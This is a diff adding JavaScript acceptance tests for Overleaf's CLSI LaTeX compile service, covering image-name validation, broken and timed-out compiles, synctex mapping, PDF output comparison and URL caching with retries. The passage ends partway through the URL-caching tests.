+\\documentclass{article} +\\begin{document} +Hello world +\\end{document}\ +`, + }, + ], + } + ClsiApp.ensureRunning(done) + }) + + describe('with a valid name', function () { + beforeEach(function (done) { + this.request.options.imageName = process.env.TEXLIVE_IMAGE + + Client.compile(this.project_id, this.request, (error, res, body) => { + this.error = error + this.res = res + this.body = body + done(error) + }) + }) + it('should return success', function () { + expect(this.res.statusCode).to.equal(200) + }) + + it('should return a PDF', function () { + let pdf + try { + pdf = Client.getOutputFile(this.body, 'pdf') + } catch (e) {} + expect(pdf).to.exist + }) + }) + + describe('with an invalid name', function () { + beforeEach(function (done) { + this.request.options.imageName = 'something/evil:1337' + Client.compile(this.project_id, this.request, (error, res, body) => { + this.error = error + this.res = res + this.body = body + done(error) + }) + }) + it('should return non success', function () { + expect(this.res.statusCode).to.not.equal(200) + }) + + it('should not return a PDF', 
function () { + let pdf + try { + pdf = Client.getOutputFile(this.body, 'pdf') + } catch (e) {} + expect(pdf).to.not.exist + }) + }) + + describe('syncToCode', function () { + beforeEach(function (done) { + Client.compile(this.project_id, this.request, done) + }) + it('should error out with an invalid imageName', function (done) { + Client.syncFromCodeWithImage( + this.project_id, + 'main.tex', + 3, + 5, + 'something/evil:1337', + (error, body) => { + expect(String(error)).to.include('statusCode=400') + expect(body).to.equal('invalid image') + done() + } + ) + }) + + it('should produce a mapping with a valid imageName', function (done) { + Client.syncFromCodeWithImage( + this.project_id, + 'main.tex', + 3, + 5, + process.env.TEXLIVE_IMAGE, + (error, result) => { + expect(error).to.not.exist + expect(result).to.deep.equal({ + pdf: [ + { + page: 1, + h: 133.768356, + v: 134.764618, + height: 6.918498, + width: 343.71106, + }, + ], + }) + done() + } + ) + }) + }) + + describe('syncToPdf', function () { + beforeEach(function (done) { + Client.compile(this.project_id, this.request, done) + }) + it('should error out with an invalid imageName', function (done) { + Client.syncFromPdfWithImage( + this.project_id, + 'main.tex', + 100, + 200, + 'something/evil:1337', + (error, body) => { + expect(String(error)).to.include('statusCode=400') + expect(body).to.equal('invalid image') + done() + } + ) + }) + + it('should produce a mapping with a valid imageName', function (done) { + Client.syncFromPdfWithImage( + this.project_id, + 1, + 100, + 200, + process.env.TEXLIVE_IMAGE, + (error, result) => { + expect(error).to.not.exist + expect(result).to.deep.equal({ + code: [{ file: 'main.tex', line: 3, column: -1 }], + }) + done() + } + ) + }) + }) + + describe('wordcount', function () { + beforeEach(function (done) { + Client.compile(this.project_id, this.request, done) + }) + it('should error out with an invalid imageName', function (done) { + Client.wordcountWithImage( + this.project_id, + 'main.tex', + 'something/evil:1337', + (error, body) => { + expect(String(error)).to.include('statusCode=400') + expect(body).to.equal('invalid image') + done() + } + ) + }) + + it('should produce a texcount with a valid imageName', function (done) { + Client.wordcountWithImage( + this.project_id, + 'main.tex', + process.env.TEXLIVE_IMAGE, + (error, result) => { + expect(error).to.not.exist + expect(result).to.exist + expect(result.texcount).to.exist + done() + } + ) + }) + }) +}) diff --git a/services/clsi/test/acceptance/js/BrokenLatexFileTests.js b/services/clsi/test/acceptance/js/BrokenLatexFileTests.js new file mode 100644 index 0000000..46d07da --- /dev/null +++ b/services/clsi/test/acceptance/js/BrokenLatexFileTests.js @@ -0,0 +1,124 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint.
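+// Compiles a deliberately malformed LaTeX file and asserts that the compile
+// reports status 'failure' while still returning the log and aux output files
+// (and no output.pdf), both on a cold first compile and on a recompile.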
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const Client = require('./helpers/Client') +const request = require('request') +const ClsiApp = require('./helpers/ClsiApp') +const { expect } = require('chai') + +describe('Broken LaTeX file', function () { + before(function (done) { + this.broken_request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{articl % :( +\\begin{documen % :( +Broken +\\end{documen % :(\ +`, + }, + ], + } + this.correct_request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\begin{document} +Hello world +\\end{document}\ +`, + }, + ], + } + return ClsiApp.ensureRunning(done) + }) + + describe('on first run', function () { + before(function (done) { + this.project_id = Client.randomId() + return Client.compile( + this.project_id, + this.broken_request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + + it('should return a failure status', function () { + return this.body.compile.status.should.equal('failure') + }) + + it('should return isInitialCompile flag', function () { + expect(this.body.compile.stats.isInitialCompile).to.equal(1) + }) + + it('should return output files', function () { + // NOTE: No output.pdf file. + this.body.compile.outputFiles + .map(f => f.path) + .should.deep.equal([ + 'output.aux', + 'output.fdb_latexmk', + 'output.fls', + 'output.log', + 'output.stderr', + 'output.stdout', + ]) + }) + }) + + return describe('on second run', function () { + before(function (done) { + this.project_id = Client.randomId() + return Client.compile(this.project_id, this.correct_request, () => { + return Client.compile( + this.project_id, + this.broken_request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + }) + + it('should return a failure status', function () { + return this.body.compile.status.should.equal('failure') + }) + + it('should not return isInitialCompile flag', function () { + expect(this.body.compile.stats.isInitialCompile).to.not.exist + }) + + it('should return output files', function () { + // NOTE: No output.pdf file. + this.body.compile.outputFiles + .map(f => f.path) + .should.deep.equal([ + 'output.aux', + 'output.fdb_latexmk', + 'output.fls', + 'output.log', + 'output.stderr', + 'output.stdout', + ]) + }) + }) +}) diff --git a/services/clsi/test/acceptance/js/DeleteOldFilesTest.js b/services/clsi/test/acceptance/js/DeleteOldFilesTest.js new file mode 100644 index 0000000..09eea1a --- /dev/null +++ b/services/clsi/test/acceptance/js/DeleteOldFilesTest.js @@ -0,0 +1,72 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
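+// Compiles a project with a single main.tex, then recompiles it with an empty
+// resources list: the source file is removed from the compile directory, so
+// the second compile is expected to fail.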
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const Client = require('./helpers/Client') +const request = require('request') +const ClsiApp = require('./helpers/ClsiApp') + +describe('Deleting Old Files', function () { + before(function (done) { + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\begin{document} +Hello world +\\end{document}\ +`, + }, + ], + } + return ClsiApp.ensureRunning(done) + }) + + return describe('on first run', function () { + before(function (done) { + this.project_id = Client.randomId() + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + + it('should return a success status', function () { + return this.body.compile.status.should.equal('success') + }) + + return describe('after file has been deleted', function () { + before(function (done) { + this.request.resources = [] + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + + return it('should return a failure status', function () { + return this.body.compile.status.should.equal('failure') + }) + }) + }) +}) diff --git a/services/clsi/test/acceptance/js/ExampleDocumentTests.js b/services/clsi/test/acceptance/js/ExampleDocumentTests.js new file mode 100644 index 0000000..b463584 --- /dev/null +++ b/services/clsi/test/acceptance/js/ExampleDocumentTests.js @@ -0,0 +1,285 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
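+// Compiles every directory under fixtures/examples twice (the second run
+// exercises the cached path) and diffs the produced PDF against the
+// checked-in output.pdf. The helpers below shell out to `convert`, `compare`
+// and `pdfinfo`, which are assumed to be on the PATH (ImageMagick and
+// poppler-utils, presumably).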
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS103: Rewrite code to no longer use __guard__ + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const Client = require('./helpers/Client') +const fetch = require('node-fetch') +const { pipeline } = require('node:stream') +const fs = require('node:fs') +const ChildProcess = require('node:child_process') +const ClsiApp = require('./helpers/ClsiApp') +const logger = require('@overleaf/logger') +const Path = require('node:path') +const fixturePath = path => { + if (path.slice(0, 3) === 'tmp') { + return '/tmp/clsi_acceptance_tests' + path.slice(3) + } + return Path.join(__dirname, '../fixtures/', path) +} +const process = require('node:process') +console.log( + process.pid, + process.ppid, + process.getuid(), + process.getgroups(), + 'PID' +) + +const MOCHA_LATEX_TIMEOUT = 60 * 1000 + +const convertToPng = function (pdfPath, pngPath, callback) { + if (callback == null) { + callback = function () {} + } + const command = `convert ${fixturePath(pdfPath)} ${fixturePath(pngPath)}` + console.log('COMMAND') + console.log(command) + const convert = ChildProcess.exec(command) + const stdout = '' + convert.stdout.on('data', chunk => console.log('STDOUT', chunk.toString())) + convert.stderr.on('data', chunk => console.log('STDERR', chunk.toString())) + return convert.on('exit', () => callback()) +} + +const compare = function (originalPath, generatedPath, callback) { + if (callback == null) { + callback = function () {} + } + const diffFile = `${fixturePath(generatedPath)}-diff.png` + const proc = ChildProcess.exec( + `compare -metric mae ${fixturePath(originalPath)} ${fixturePath( + generatedPath + )} ${diffFile}` + ) + let stderr = '' + proc.stderr.on('data', chunk => (stderr += chunk)) + return proc.on('exit', () => { + if (stderr.trim() === '0 (0)') { + // remove output diff if test matches expected image + fs.unlink(diffFile, err => { + if (err) { + throw err + } + }) + return callback(null, true) + } else { + console.log('compare result', stderr) + return callback(null, false) + } + }) +} + +const checkPdfInfo = function (pdfPath, callback) { + if (callback == null) { + callback = function () {} + } + const proc = ChildProcess.exec(`pdfinfo ${fixturePath(pdfPath)}`) + let stdout = '' + proc.stdout.on('data', chunk => (stdout += chunk)) + proc.stderr.on('data', chunk => console.log('STDERR', chunk.toString())) + return proc.on('exit', () => { + if (stdout.match(/Optimized:\s+yes/)) { + return callback(null, true) + } else { + return callback(null, false) + } + }) +} + +const compareMultiplePages = function (projectId, callback) { + if (callback == null) { + callback = function () {} + } + function compareNext(pageNo, callback) { + const path = `tmp/${projectId}-source-${pageNo}.png` + return fs.stat(fixturePath(path), (error, stat) => { + if (error != null) { + return callback() + } else { + return compare( + `tmp/${projectId}-source-${pageNo}.png`, + `tmp/${projectId}-generated-${pageNo}.png`, + (error, same) => { + if (error != null) { + throw error + } + same.should.equal(true) + return compareNext(pageNo + 1, callback) + } + ) + } + }) + } + return compareNext(0, callback) +} + +const comparePdf = function (projectId, exampleDir, callback) { + if (callback == null) { + callback = function () {} + } + console.log('CONVERT') + 
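+  // Rasterise the generated PDF and the reference output.pdf to PNGs, then
+  // diff them; `convert` may emit page-numbered files (-0.png, -1.png, ...)
+  // for multi-page documents, which compareMultiplePages above handles.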
console.log(`tmp/${projectId}.pdf`, `tmp/${projectId}-generated.png`) + return convertToPng( + `tmp/${projectId}.pdf`, + `tmp/${projectId}-generated.png`, + error => { + if (error != null) { + throw error + } + return convertToPng( + `examples/${exampleDir}/output.pdf`, + `tmp/${projectId}-source.png`, + error => { + if (error != null) { + throw error + } + return fs.stat( + fixturePath(`tmp/${projectId}-source-0.png`), + (error, stat) => { + if (error != null) { + return compare( + `tmp/${projectId}-source.png`, + `tmp/${projectId}-generated.png`, + (error, same) => { + if (error != null) { + throw error + } + same.should.equal(true) + return callback() + } + ) + } else { + return compareMultiplePages(projectId, error => { + if (error != null) { + throw error + } + return callback() + }) + } + } + ) + } + ) + } + ) +} + +const downloadAndComparePdf = function (projectId, exampleDir, url, callback) { + fetch(url) + .then(res => { + if (!res.ok) { + return callback(new Error('non success response: ' + res.statusText)) + } + + const dest = fs.createWriteStream(fixturePath(`tmp/${projectId}.pdf`)) + pipeline(res.body, dest, err => { + if (err) return callback(err) + + checkPdfInfo(`tmp/${projectId}.pdf`, (err, optimised) => { + if (err) return callback(err) + + optimised.should.equal(true) + comparePdf(projectId, exampleDir, callback) + }) + }) + }) + .catch(callback) +} + +describe('Example Documents', function () { + Client.runFakeFilestoreService(fixturePath('examples')) + + before(function (done) { + ClsiApp.ensureRunning(done) + }) + before(function (done) { + fs.rm(fixturePath('tmp'), { force: true, recursive: true }, done) + }) + before(function (done) { + fs.mkdir(fixturePath('tmp'), done) + }) + after(function (done) { + fs.rm(fixturePath('tmp'), { force: true, recursive: true }, done) + }) + + return Array.from(fs.readdirSync(fixturePath('examples'))).map(exampleDir => + (exampleDir => + describe(exampleDir, function () { + before(function () { + return (this.project_id = Client.randomId() + '_' + exampleDir) + }) + + it('should generate the correct pdf', function (done) { + this.timeout(MOCHA_LATEX_TIMEOUT) + return Client.compileDirectory( + this.project_id, + fixturePath('examples'), + exampleDir, + (error, res, body) => { + if ( + error || + __guard__( + body != null ? body.compile : undefined, + x => x.status + ) === 'failure' + ) { + console.log('DEBUG: error', error, 'body', JSON.stringify(body)) + return done(new Error('Compile failed')) + } + const pdf = Client.getOutputFile(body, 'pdf') + return downloadAndComparePdf( + this.project_id, + exampleDir, + pdf.url, + done + ) + } + ) + }) + + return it('should generate the correct pdf on the second run as well', function (done) { + this.timeout(MOCHA_LATEX_TIMEOUT) + return Client.compileDirectory( + this.project_id, + fixturePath('examples'), + exampleDir, + (error, res, body) => { + if ( + error || + __guard__( + body != null ? body.compile : undefined, + x => x.status + ) === 'failure' + ) { + console.log('DEBUG: error', error, 'body', JSON.stringify(body)) + return done(new Error('Compile failed')) + } + const pdf = Client.getOutputFile(body, 'pdf') + return downloadAndComparePdf( + this.project_id, + exampleDir, + pdf.url, + done + ) + } + ) + }) + }))(exampleDir) + ) +}) + +function __guard__(value, transform) { + return typeof value !== 'undefined' && value !== null + ? 
transform(value) + : undefined +} } diff --git a/services/clsi/test/acceptance/js/SimpleLatexFileTests.js b/services/clsi/test/acceptance/js/SimpleLatexFileTests.js new file mode 100644 index 0000000..e2256b2 --- /dev/null +++ b/services/clsi/test/acceptance/js/SimpleLatexFileTests.js @@ -0,0 +1,91 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const Client = require('./helpers/Client') +const request = require('request') +const ClsiApp = require('./helpers/ClsiApp') +const Settings = require('@overleaf/settings') + +describe('Simple LaTeX file', function () { + before(function (done) { + this.project_id = Client.randomId() + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\begin{document} +Hello world +\\end{document}\ +`, + }, + ], + options: { + metricsPath: 'clsi-perf', + metricsMethod: 'priority', + }, + } + return ClsiApp.ensureRunning(() => { + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + }) + + it('should return the PDF', function () { + const pdf = Client.getOutputFile(this.body, 'pdf') + return pdf.type.should.equal('pdf') + }) + + it('should return the log', function () { + const log = Client.getOutputFile(this.body, 'log') + return log.type.should.equal('log') + }) + + it('should provide the pdf for download', function (done) { + const pdf = Client.getOutputFile(this.body, 'pdf') + return request.get(pdf.url, (error, res, body) => { + if (error) return done(error) + res.statusCode.should.equal(200) + return done() + }) + }) + + it('should provide the log for download', function (done) { + const log = Client.getOutputFile(this.body, 'log') + return request.get(log.url, (error, res, body) => { + if (error) return done(error) + res.statusCode.should.equal(200) + return done() + }) + }) + + it('should gather personalized metrics', function (done) { + request.get(`${Settings.apis.clsi.url}/metrics`, (err, res, body) => { + if (err) return done(err) + body + .split('\n') + .some(line => { + return ( + line.startsWith('compile') && + line.includes('path="clsi-perf"') && + line.includes('method="priority"') + ) + }) + .should.equal(true) + done() + }) + }) +}) diff --git a/services/clsi/test/acceptance/js/Stats.js b/services/clsi/test/acceptance/js/Stats.js new file mode 100644 index 0000000..4f071ab --- /dev/null +++ b/services/clsi/test/acceptance/js/Stats.js @@ -0,0 +1,16 @@ +const request = require('request') +const Settings = require('@overleaf/settings') +after(function (done) { + request( + { + url: `${Settings.apis.clsi.url}/metrics`, + }, + (err, response, body) => { + if (err) return done(err) + console.error('-- metrics --') + console.error(body) + console.error('-- metrics --') + done() + } + ) +}) diff --git a/services/clsi/test/acceptance/js/SynctexTests.js b/services/clsi/test/acceptance/js/SynctexTests.js new file mode 100644 index 0000000..5ba5bb5 --- /dev/null +++ b/services/clsi/test/acceptance/js/SynctexTests.js @@ -0,0 +1,188 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint.
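+// Exercises the two synctex endpoints: code-to-PDF (file/line/column in,
+// page/h/v positions out) and PDF-to-code, plus the 404 responses when the
+// project directory or a usable synctex file does not exist.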
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const Client = require('./helpers/Client') +const request = require('request') +const { expect } = require('chai') +const ClsiApp = require('./helpers/ClsiApp') +const crypto = require('node:crypto') + +describe('Syncing', function () { + before(function (done) { + const content = `\ +\\documentclass{article} +\\begin{document} +Hello world +\\end{document}\ +` + this.request = { + resources: [ + { + path: 'main.tex', + content, + }, + ], + } + this.project_id = Client.randomId() + return ClsiApp.ensureRunning(() => { + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + }) + + describe('from code to pdf', function () { + return it('should return the correct location', function (done) { + return Client.syncFromCode( + this.project_id, + 'main.tex', + 3, + 5, + (error, pdfPositions) => { + if (error != null) { + throw error + } + expect(pdfPositions).to.deep.equal({ + pdf: [ + { + page: 1, + h: 133.768356, + v: 134.764618, + height: 6.918498, + width: 343.71106, + }, + ], + }) + return done() + } + ) + }) + }) + + describe('from pdf to code', function () { + return it('should return the correct location', function (done) { + return Client.syncFromPdf( + this.project_id, + 1, + 100, + 200, + (error, codePositions) => { + if (error != null) { + throw error + } + expect(codePositions).to.deep.equal({ + code: [{ file: 'main.tex', line: 3, column: -1 }], + }) + return done() + } + ) + }) + }) + + describe('when the project directory is not available', function () { + before(function () { + this.other_project_id = Client.randomId() + }) + describe('from code to pdf', function () { + it('should return a 404 response', function (done) { + return Client.syncFromCode( + this.other_project_id, + 'main.tex', + 3, + 5, + (error, body) => { + expect(String(error)).to.include('statusCode=404') + expect(body).to.equal('Not Found') + return done() + } + ) + }) + }) + describe('from pdf to code', function () { + it('should return a 404 response', function (done) { + return Client.syncFromPdf( + this.other_project_id, + 1, + 100, + 200, + (error, body) => { + expect(String(error)).to.include('statusCode=404') + expect(body).to.equal('Not Found') + return done() + } + ) + }) + }) + }) + + describe('when the synctex file is not available', function () { + before(function (done) { + this.broken_project_id = Client.randomId() + const content = 'this is not valid tex' // not a valid tex file + this.request = { + resources: [ + { + path: 'main.tex', + content, + }, + ], + } + Client.compile( + this.broken_project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + + describe('from code to pdf', function () { + it('should return a 404 response', function (done) { + return Client.syncFromCode( + this.broken_project_id, + 'main.tex', + 3, + 5, + (error, body) => { + expect(String(error)).to.include('statusCode=404') + expect(body).to.equal('Not Found') + return done() + } + ) + }) + }) + describe('from pdf to code', function () { + it('should return a 404 response', function (done) { + return Client.syncFromPdf( + this.broken_project_id, + 1, + 100, + 200, + (error, 
body) => { + expect(String(error)).to.include('statusCode=404') + expect(body).to.equal('Not Found') + return done() + } + ) + }) + }) + }) +}) diff --git a/services/clsi/test/acceptance/js/TimeoutTests.js b/services/clsi/test/acceptance/js/TimeoutTests.js new file mode 100644 index 0000000..e9175d2 --- /dev/null +++ b/services/clsi/test/acceptance/js/TimeoutTests.js @@ -0,0 +1,66 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const Client = require('./helpers/Client') +const request = require('request') +const ClsiApp = require('./helpers/ClsiApp') +const { expect } = require('chai') + +describe('Timed out compile', function () { + before(function (done) { + this.request = { + options: { + timeout: 10, + }, // seconds + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\begin{document} +\\def\\x{Hello!\\par\\x} +\\x +\\end{document}\ +`, + }, + ], + } + this.project_id = Client.randomId() + return ClsiApp.ensureRunning(() => { + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + }) + + it('should return a timeout error', function () { + return this.body.compile.error.should.equal('container timed out') + }) + + it('should return a timedout status', function () { + return this.body.compile.status.should.equal('timedout') + }) + + it('should return isInitialCompile flag', function () { + expect(this.body.compile.stats.isInitialCompile).to.equal(1) + }) + + return it('should return the log output file name', function () { + const outputFilePaths = this.body.compile.outputFiles.map(x => x.path) + return outputFilePaths.should.include('output.log') + }) +}) diff --git a/services/clsi/test/acceptance/js/UrlCachingTests.js b/services/clsi/test/acceptance/js/UrlCachingTests.js new file mode 100644 index 0000000..9fc9608 --- /dev/null +++ b/services/clsi/test/acceptance/js/UrlCachingTests.js @@ -0,0 +1,617 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
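+// These tests run a fake filestore whose routes can be made to fail a fixed
+// number of times, and spy on Server.getFile to count downloads: 503s are
+// retried, an unchanged `modified` date hits the cache, a changed or missing
+// date forces a re-download, and fallbackURL is used when the primary 404s.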
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const express = require('express') +const Path = require('node:path') +const Client = require('./helpers/Client') +const sinon = require('sinon') +const ClsiApp = require('./helpers/ClsiApp') +const request = require('request') +const Settings = require('@overleaf/settings') + +const Server = { + run() { + const app = express() + + const staticServer = express.static(Path.join(__dirname, '../fixtures/')) + + const alreadyFailed = new Map() + app.get('/fail/:times/:id', (req, res) => { + this.getFile(req.url) + + const soFar = alreadyFailed.get(req.params.id) || 0 + const wanted = parseInt(req.params.times, 10) + if (soFar < wanted) { + alreadyFailed.set(req.params.id, soFar + 1) + res.status(503).end() + } else { + res.send('THE CONTENT') + } + }) + + app.get('/not-found', (req, res, next) => { + this.getFile(req.url) + res.status(404).end() + }) + + app.get('/project/:projectId/file/:fileId', (req, res, next) => { + this.getFile(req.url) + return res.send(`${req.params.projectId}:${req.params.fileId}`) + }) + + app.get('/bucket/:bucket/key/*', (req, res, next) => { + this.getFile(req.url) + return res.send(`${req.params.bucket}:${req.params[0]}`) + }) + + app.get('/:random_id/*', (req, res, next) => { + this.getFile(req.url) + req.url = `/${req.params[0]}` + return staticServer(req, res, next) + }) + + Client.startFakeFilestoreApp(app) + }, + + getFile() {}, + + randomId() { + return Math.random().toString(16).slice(2) + }, +} + +describe('Url Caching', function () { + Server.run() + + describe('Retries', function () { + before(function (done) { + this.project_id = Client.randomId() + this.happyFile = `${Server.randomId()}/lion.png` + this.retryFileOnce = `fail/1/${Server.randomId()}` + this.retryFileTwice = `fail/2/${Server.randomId()}` + this.fatalFile = `fail/42/${Server.randomId()}` + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\usepackage{graphicx} +\\begin{document} +\\includegraphics{lion.png} +\\end{document}\ +`, + }, + { + path: 'lion.png', + url: `http://filestore/${this.happyFile}`, + }, + { + path: 'foo.tex', + url: `http://filestore/${this.retryFileOnce}`, + }, + { + path: 'foo.tex', + url: `http://filestore/${this.retryFileTwice}`, + }, + { + path: 'foo.tex', + url: `http://filestore/${this.fatalFile}`, + }, + ], + } + + sinon.spy(Server, 'getFile') + ClsiApp.ensureRunning(() => { + Client.compile(this.project_id, this.request, (error, res, body) => { + this.error = error + this.res = res + this.body = body + done() + }) + }) + }) + + after(function () { + Server.getFile.restore() + }) + + function expectNFilestoreRequests(file, count) { + Server.getFile.args.filter(a => a[0] === file).should.have.length(count) + } + + it('should download the happy file once', function () { + expectNFilestoreRequests(`/${this.happyFile}`, 1) + }) + it('should retry the download of the unhappy files', function () { + expectNFilestoreRequests(`/${this.retryFileOnce}`, 2) + expectNFilestoreRequests(`/${this.retryFileTwice}`, 3) + expectNFilestoreRequests(`/${this.fatalFile}`, 3) + }) + }) + + describe('Downloading an image for the first time', function () { + before(function (done) { + this.project_id = Client.randomId() + this.file = `${Server.randomId()}/lion.png` + this.request = { + 
resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\usepackage{graphicx} +\\begin{document} +\\includegraphics{lion.png} +\\end{document}\ +`, + }, + { + path: 'lion.png', + url: `http://filestore/${this.file}`, + }, + ], + } + + sinon.spy(Server, 'getFile') + return ClsiApp.ensureRunning(() => { + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + }) + + afterEach(function () { + return Server.getFile.restore() + }) + + return it('should download the image', function () { + return Server.getFile.calledWith(`/${this.file}`).should.equal(true) + }) + }) + + describe('When an image is in the cache and the last modified date is unchanged', function () { + before(function (done) { + this.project_id = Client.randomId() + this.file = `${Server.randomId()}/lion.png` + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\usepackage{graphicx} +\\begin{document} +\\includegraphics{lion.png} +\\end{document}\ +`, + }, + (this.image_resource = { + path: 'lion.png', + url: `http://filestore/${this.file}`, + modified: Date.now(), + }), + ], + } + + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + sinon.spy(Server, 'getFile') + return Client.compile( + this.project_id, + this.request, + (error1, res1, body1) => { + this.error = error1 + this.res = res1 + this.body = body1 + return done() + } + ) + } + ) + }) + + after(function () { + return Server.getFile.restore() + }) + + it('should not download the image again', function () { + return Server.getFile.called.should.equal(false) + }) + + it('should gather metrics', function (done) { + request.get(`${Settings.apis.clsi.url}/metrics`, (err, res, body) => { + if (err) return done(err) + body + .split('\n') + .some(line => { + return ( + line.startsWith('url_source') && line.includes('path="unknown"') + ) + }) + .should.equal(true) + done() + }) + }) + }) + + describe('When an image is in the cache and the last modified date is advanced', function () { + before(function (done) { + this.project_id = Client.randomId() + this.file = `${Server.randomId()}/lion.png` + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\usepackage{graphicx} +\\begin{document} +\\includegraphics{lion.png} +\\end{document}\ +`, + }, + (this.image_resource = { + path: 'lion.png', + url: `http://filestore/${this.file}`, + modified: (this.last_modified = Date.now()), + }), + ], + } + + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + sinon.spy(Server, 'getFile') + this.image_resource.modified = new Date(this.last_modified + 3000) + return Client.compile( + this.project_id, + this.request, + (error1, res1, body1) => { + this.error = error1 + this.res = res1 + this.body = body1 + return done() + } + ) + } + ) + }) + + afterEach(function () { + return Server.getFile.restore() + }) + + return it('should download the image again', function () { + return Server.getFile.called.should.equal(true) + }) + }) + + describe('When an image is in the cache and the last modified date is further in the past', function () { + before(function (done) { + this.project_id = Client.randomId() + this.file = `${Server.randomId()}/lion.png` + this.request = { + resources: [ + { + path: 
'main.tex', + content: `\ +\\documentclass{article} +\\usepackage{graphicx} +\\begin{document} +\\includegraphics{lion.png} +\\end{document}\ +`, + }, + (this.image_resource = { + path: 'lion.png', + url: `http://filestore/${this.file}`, + modified: (this.last_modified = Date.now()), + }), + ], + } + + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + sinon.spy(Server, 'getFile') + this.image_resource.modified = new Date(this.last_modified - 3000) + return Client.compile( + this.project_id, + this.request, + (error1, res1, body1) => { + this.error = error1 + this.res = res1 + this.body = body1 + return done() + } + ) + } + ) + }) + + afterEach(function () { + return Server.getFile.restore() + }) + + return it('should download the other revision', function () { + return Server.getFile.called.should.equal(true) + }) + }) + + describe('When an image is in the cache and the last modified date is not specified', function () { + before(function (done) { + this.project_id = Client.randomId() + this.file = `${Server.randomId()}/lion.png` + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\usepackage{graphicx} +\\begin{document} +\\includegraphics{lion.png} +\\end{document}\ +`, + }, + (this.image_resource = { + path: 'lion.png', + url: `http://filestore/${this.file}`, + modified: (this.last_modified = Date.now()), + }), + ], + } + + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + sinon.spy(Server, 'getFile') + delete this.image_resource.modified + return Client.compile( + this.project_id, + this.request, + (error1, res1, body1) => { + this.error = error1 + this.res = res1 + this.body = body1 + return done() + } + ) + } + ) + }) + + afterEach(function () { + return Server.getFile.restore() + }) + + return it('should download the image again', function () { + return Server.getFile.called.should.equal(true) + }) + }) + + describe('After clearing the cache', function () { + before(function (done) { + this.project_id = Client.randomId() + this.file = `${Server.randomId()}/lion.png` + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\usepackage{graphicx} +\\begin{document} +\\includegraphics{lion.png} +\\end{document}\ +`, + }, + (this.image_resource = { + path: 'lion.png', + url: `http://filestore/${this.file}`, + modified: (this.last_modified = Date.now()), + }), + ], + } + + return Client.compile(this.project_id, this.request, error => { + if (error != null) { + throw error + } + return Client.clearCache(this.project_id, (error, res, body) => { + if (error != null) { + throw error + } + sinon.spy(Server, 'getFile') + return Client.compile( + this.project_id, + this.request, + (error1, res1, body1) => { + this.error = error1 + this.res = res1 + this.body = body1 + return done() + } + ) + }) + }) + }) + + afterEach(function () { + return 